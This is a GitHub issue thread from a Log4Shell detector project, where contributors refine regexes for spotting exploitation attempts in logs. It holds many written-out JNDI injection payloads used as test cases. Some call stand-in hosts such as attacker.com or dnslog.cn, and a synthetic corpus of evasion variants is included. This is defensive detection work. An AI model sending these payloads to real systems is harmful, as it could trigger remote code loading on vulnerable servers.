Neo23x0 / log4shell-detector

Detector for Log4Shell exploitation attempts
MIT License

Doing just the same using a RegEx #5

Open back2root opened 2 years ago

back2root commented 2 years ago

The following RegEx does the equivalent of the script. I'm not sure it still counts as a reasonable regular expression, but it's doable:

(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])

It matches the following strings case-insensitively, even if they are (partially) URL-encoded:

Example: [image]

Improvement idea for the script: to reduce the chance of false positives and improve performance a bit, you could require that the '$' sign at the start is immediately followed by a '{'.

Neo23x0 commented 2 years ago

That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

Neo23x0 commented 2 years ago

I can't make it match on my log files with

sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log

Maybe egrep is limited somehow, e.g. missing back-references.

Log line in one of the test files:

2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
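One possible explanation, stated here as an assumption rather than a confirmed diagnosis: the `(?:...)` non-capturing groups are Perl-style syntax that POSIX extended regular expressions, the dialect egrep uses, do not define. The sketch below feeds the same pattern to Python's `re` module, which does accept that syntax, and checks it against the log line above. The names `PATTERN` and `LOG_LINE` are only illustrative.

```python
import re

# The regex from this thread, copied unchanged and split across several
# raw-string pieces purely for readability.
PATTERN = re.compile(
    r"(?:\$|%24)(?:{|%7[Bb])"
    r".{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee])"
    r".{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}"
    r"(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1)"
    r".{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?"
    r"|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)"
    r"|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3))"
    r".{0,30}(?::|%3[Aa])"
)

# Test log line quoted in the comment above.
LOG_LINE = "2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}"

# A line without any "${" should be left alone.
BENIGN_LINE = "2021-12-11 [MyApp] - Nothing to see here"

print(bool(PATTERN.search(LOG_LINE)))
print(bool(PATTERN.search(BENIGN_LINE)))
```

If the pattern matches here but not under egrep, that points at the regex dialect rather than at the pattern itself.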

back2root commented 2 years ago

Not yet tested on egrep or the CLI in general. Since it should be valid PCRE, maybe a Perl one-liner can get us results. Maybe I can craft something later.

Neo23x0 commented 2 years ago

Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). Thanks for your help.

karanlyons commented 2 years ago

Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}¹, ${jnd${upper:ı}:rm${upper:ı}://addr}). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

¹ EDIT: Turns out the former won't work by default because base64 isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
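To make the two examples above concrete, here is a minimal sketch of why a regex that looks for the literal letters of "jndi" can miss them. `LETTERS_RE` is a simplified, hypothetical stand-in, not back2root's actual pattern, and the sketch assumes that Log4j's `upper` lookup behaves like ordinary Unicode uppercasing.

```python
import base64
import re

# Hypothetical, simplified letter-sequence regex: after "${" it expects the
# literal letters j, n, d, i (either case), each within 30 characters.
LETTERS_RE = re.compile(
    r"\$\{.{0,30}[jJ].{0,30}[nN].{0,30}[dD].{0,30}[iI].{0,30}:"
)

plain = "${jndi:ldap://addr}"
dotless = "${jnd${upper:ı}:rm${upper:ı}://addr}"
encoded = "${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}"

# The plain payload contains the expected letters; the other two do not.
for payload in (plain, dotless, encoded):
    print(payload, bool(LETTERS_RE.search(payload)))

# The dotless i (U+0131) only becomes an ASCII "I" once it is uppercased.
print("ı".upper())

# The base64 payload only reveals "jndi" once it is decoded.
print(base64.b64decode("JHtqbmRpOmxkYXA6YWRkcn0=").decode())
```

In both cases the letters the regex is looking for only exist after the lookup has been evaluated, so they never appear in the raw log line.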

back2root commented 2 years ago

Hi

I just now managed to test the regex on the CLI. The RegEx seems to work with grep -P against the test cases from this repo.

Current limitations:

➜  test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log

➜  test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4

➜  test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

Maybe I'll manage to work on a version covering the missing protocols: nis|iiop|corba|nds|http. If there's interest, I'm happy to share.

Neo23x0 commented 2 years ago

Yes, please. We can replace the regex in this advisory with your version if it covers the old strings and their obfuscated versions. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

I wouldn't replace it as long as it can't detect the other protocols.

back2root commented 2 years ago

Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.

Feel free to use it or reference it in your gist.

➜  log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
 _                _  _  ____  _          _ _       ____
| |    ___   __ _| || |/ ___|| |__   ___| | |     |  _ \ _____  __
| |   / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__   _|__) | | | |  __/ | |_____|  _ <  __/>  <
|_____\___/ \__, |  |_||____/|_| |_|\___|_|_|     |_| \_\___/_/\_\
            |___/

➜  log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D
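
The idea of generating the pattern instead of writing it by hand can be sketched in a few lines. This is not the RegEx_Generator.sh script from log4shell-rex; it is a minimal Python illustration, and the helper names `char_alt`, `word` and `build_regex` are hypothetical. It only covers case variants and single URL encoding, so the double-encoded lines in the output above are out of its reach.

```python
import re

GAP = ".{0,30}"  # bounded filler between characters, as in the thread's regex


def char_alt(ch: str) -> str:
    """Return an alternation matching ch in either case, raw or as %XX."""
    alts = []
    for c in sorted({ch.lower(), ch.upper()}):
        alts.append(re.escape(c))
        hexcode = f"{ord(c):02X}"
        # Hex digits A-F may appear in either case inside a URL escape.
        alts.append("%" + "".join(
            f"[{h}{h.lower()}]" if h.isalpha() else h for h in hexcode
        ))
    return "(?:" + "|".join(alts) + ")"


def word(w: str) -> str:
    """Join the per-character alternations of w with bounded gaps."""
    return GAP.join(char_alt(c) for c in w)


def build_regex(protocols):
    """Build a pattern for '${' + jndi + ':' + one protocol + ':'."""
    protos = "(?:" + "|".join(word(p) for p in protocols) + ")"
    parts = [
        char_alt("$") + char_alt("{"),  # '$' immediately followed by '{'
        word("jndi"),
        char_alt(":"),
        protos,
        char_alt(":"),
    ]
    return re.compile(GAP.join(parts))


# Protocol names taken from this thread.
LOG4SHELL_RE = build_regex(
    ["ldap", "rmi", "dns", "nis", "iiop", "corba", "nds", "http"]
)

print(bool(LOG4SHELL_RE.search("${jNdI:ldAp://tj5udg.dnslog.cn}")))
print(bool(LOG4SHELL_RE.search("$%7Bjndi:ldap://tj5udg.dnslog.cn%7D")))
```

Adding a protocol then means adding one string to the list rather than hand-editing a long alternation.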

karanlyons commented 2 years ago

You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):

\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d

You can see how my detections fare, and run your own examples against the test(string) and test_thorough(string) functions.

I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.
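A rough sketch of what such a naive-Bayes-style score could look like. The three patterns are the simpler ones listed later in this thread; the hit rates and the prior are hypothetical placeholders that would have to be estimated from data in your own environment. Naive Bayes also assumes the detectors fire independently, which these overlapping patterns do not, so treat the result as a ranking aid rather than a calibrated probability.

```python
import math
import re

DETECTORS = {
    "SIMPLE_RE": re.compile(r"\$\{\s*jndi\s*:.*\}"),
    "NESTED_RE": re.compile(r"\$\{.*\$\{.*\}.*\}"),
    "ANY_RE": re.compile(r"\$\{.*\}"),
}

# HYPOTHETICAL rates: (P(hit | attack), P(hit | benign)) per detector.
RATES = {
    "SIMPLE_RE": (0.60, 0.001),
    "NESTED_RE": (0.50, 0.01),
    "ANY_RE": (0.95, 0.05),
}

PRIOR_ATTACK = 0.01  # HYPOTHETICAL prior probability that a line is an attack


def log_odds(line: str) -> float:
    """Sum the prior log-odds and one log-likelihood ratio per detector."""
    score = math.log(PRIOR_ATTACK / (1 - PRIOR_ATTACK))
    for name, regex in DETECTORS.items():
        p_attack, p_benign = RATES[name]
        if regex.search(line):
            score += math.log(p_attack / p_benign)
        else:
            score += math.log((1 - p_attack) / (1 - p_benign))
    return score


def probability(line: str) -> float:
    """Convert log-odds back into a probability between 0 and 1."""
    return 1 / (1 + math.exp(-log_odds(line)))


for sample in ("${jndi:ldap://addr}", "${${::-j}ndi:addr}", "GET /index.html 200"):
    print(f"{probability(sample):.4f}  {sample}")
```

A broad pattern such as ANY_RE adds little evidence on its own, while a hit on a narrow pattern moves the score a lot, which is one way to express the signal-to-noise trade-off in numbers.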

back2root commented 2 years ago

@karanlyons I'm wondering whether an exploit is possible without any protocol given and without a forward slash, e.g. ${ jndi\t: addr\n}

[image]

Not yet sure about the false positive rate.

karanlyons commented 2 years ago

https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:

The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added. By default the JNDI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.

https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:

In the comp context, there are two bindings: env and UserTransaction. The name env is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor. env is short for environment.

https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/5/html/administration_and_configuration_guide/naming_on_jboss-j2ee_and_jndi___the_application_component_environment#ENC_Usage_Conventions-Environment_Entries:

Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.

So a contrived example would be, e.g., that there’s comp/env/pwd = "/" and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr} as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.

Also keep in mind that jndi is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64 lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.

Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probable vectors at them. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.

But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class or log4j2.formatMsgNoLookups=true) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress, including DNS if you can handle running your own resolver safely, and jail everything on your machine). No detections on remote inputs are going to be able to find every attempt; it’s a cat-and-mouse game stacked heavily in the attacker’s favor.

¹ EDIT: Again, because base64 isn't actually in a release yet, just in master, but—also again—imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
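
As a companion to the "rm JndiLookup.class" mitigation mentioned above, a small sketch for checking whether a given jar still ships that class. The function name `has_jndi_lookup` is hypothetical, and the sketch only looks at the top level of one archive; jars nested inside other archives (fat jars, WAR files) would need to be unpacked and checked recursively.

```python
import zipfile

# Path of the class inside log4j-core jars.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def has_jndi_lookup(jar) -> bool:
    """Return True if the jar (a path or a file-like object) contains
    JndiLookup.class at its usual location."""
    with zipfile.ZipFile(jar) as archive:
        return JNDI_LOOKUP in archive.namelist()
```

Usage would be something like `has_jndi_lookup("log4j-core-2.14.1.jar")`, where the file name is only an example.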

back2root commented 2 years ago

Thanks @karanlyons. I made some improvements to my RegEx and already get quite good coverage. It may still not be enough for use in an IPS, but it's a good starting point for SIEM detections.

karanlyons commented 2 years ago

I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:

>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]

>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False

>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:

>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?

back2root commented 2 years ago

Updated my regex